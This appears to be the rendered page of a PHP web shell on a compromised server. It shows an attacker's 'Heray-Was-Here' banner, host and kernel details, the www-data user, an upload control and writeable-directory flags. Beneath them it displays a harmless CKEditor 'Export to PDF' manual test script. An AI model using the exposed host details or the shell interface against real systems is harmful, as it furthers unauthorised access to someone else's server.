Heray-Was-Here
Server : Apache
System : Linux mail.lomejor.cr 6.8.0-1059-azure #65~22.04.1-Ubuntu SMP Thu May 28 16:59:19 UTC 2026 x86_64
User : www-data ( 33)
PHP Version : 8.2.31
Disable Function : NONE
Directory :  /var/www/dev/htdocs/includes/ckeditor/ckeditor/plugins/exportpdf/tests/manual/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/dev/htdocs/includes/ckeditor/ckeditor/plugins/exportpdf/tests/manual/emptyeditor.md
@bender-tags: exportpdf, feature, 11
@bender-ui: collapsed
@bender-include: ../_helpers/tools.js
@bender-ckeditor-plugins: wysiwygarea, toolbar, basicstyles, notification

**Note:** At the beginning open the console.

1. Click `Export to PDF` button (the one next to the `Source` button) in the first editor.
1. Wait for the file to download.
1. Open the file.

  **Expected:**

  * Empty file was downloaded.
  * No errors in console.

  **Unexpected:**

  * File wasn't downloaded.
  * File was downloaded but can't be opened.
  * Error in the console appeared.

1. Click `Export to PDF` button in the second editor.

  **Expected:**

  * File wasn't downloaded.
  * The notification with error appeared in the editor.
  * There is an error message in the console.

  **Unexpected:**

  * File was downloaded and can't be opened.
  * Success notification was displayed.

Hry